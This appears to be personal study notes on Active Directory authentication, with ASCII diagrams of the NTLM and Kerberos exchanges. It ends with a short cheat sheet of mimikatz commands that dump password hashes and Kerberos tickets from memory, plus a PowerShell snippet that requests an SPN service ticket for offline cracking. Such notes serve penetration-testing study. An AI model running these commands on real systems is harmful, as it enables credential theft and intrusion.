Skip to content

AD - authentication

NTLM

Client                              Application                Domain Controller
                                      Server                         (DC)
  |                                      |                                                 |
  | [Step 1]                             |                                                 |
  | Calculate NTLM hash                  |                                                 |
  | (from user password)                 |                                                 |
  |                                      |                                                 |
  | [Step 2]-------------------------->  |                                                 |
  | NTLM NEGOTATION                      |                                                 |
  | (send username to AS)                |                                                 |
  |                                      |                                                 |
  |                                      |                                                 |
  | <---------------------------[Step 3] |                                                 |
  | NTLM CHALLANGE                       |                                                 |
  | (AS return random Nonce)             |                                                 |
  |                                      |                                                 |
  |                                      |                                                 |
  | [Step 4]-------------------------->  |                                                 |
  | NTLM Authenticate Message            |                                                 |
  | (Encrypt Nonce with NTLM hash)       |                                                 |
  | (send Encrypted Nonce to AS)         |                                                 |
  |                                      | [Step 5] -------------------------------------> |
  |                                      | NetLogon Network Info                           |
  |                                      | (send EncryptedNonce, Username and Nonce to DC) |
  |                                      |                                                 |
  |                                      |                                                 |
  |                                      |                                                 |
  |                                      | <--------------------------------------[Step 6] |
  |                                      | (Approve/Reject)                                |
  |                                      |                                                 |

Kerberos

Client                           Domain Controller   Application Server
                                       (DC)          (Resource Server)
  |                                      |                   |
  | ---------------------------------->  |                   |
  | Autentication Server Request         |                   |
  |                                      |                   |
  |                                      |                   |
  |                                      |                   |
  | <----------------------------------- |                   |
  | Autentication Server Reply           |                   |
  |                                      |                   |
  |                                      |                   |
  |                                      |                   |
  | ---------------------------------->  |                   |
  | Ticket Granting Service Request      |                   |
  |                                      |                   |
  |                                      |                   |
  |                                      |                   |
  | <----------------------------------- |                   |
  | Ticket Granting Server Reply         |                   |
  |                                      |                   |
  |                                   ---+---                |
  |                                                          |
  | ------------------------------------------------------>  |
  | Application Request                                      |
  | <------------------------------------------------------  |
  | Application Response                                     |
  |                                                          |
  |
  • Autentication Server Request
    • Preperation
      • Client will create hash from user and password
      • Client will encrypt timestamp with user hash
    • Payload: Encrypted timestamp
  • Autetication Server reply
    • Preperation
      • DC will create hash from user and password
      • DC will decrypt timestamp
    • Payload: Session Key(encrypted with user hash) + TGT
  • Ticket Granting Service Request
    • ...
  • Ticket Granting Server Reply
    • Payload:
      • SPN
      • Session Key
      • Service Ticket
  • Application Request / Response
    • Resource server will accept or reject request

Dumpl hashes

> mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonpasswords

Dump tickets

> mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::tickets

Create Service Token by SPN

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'
klist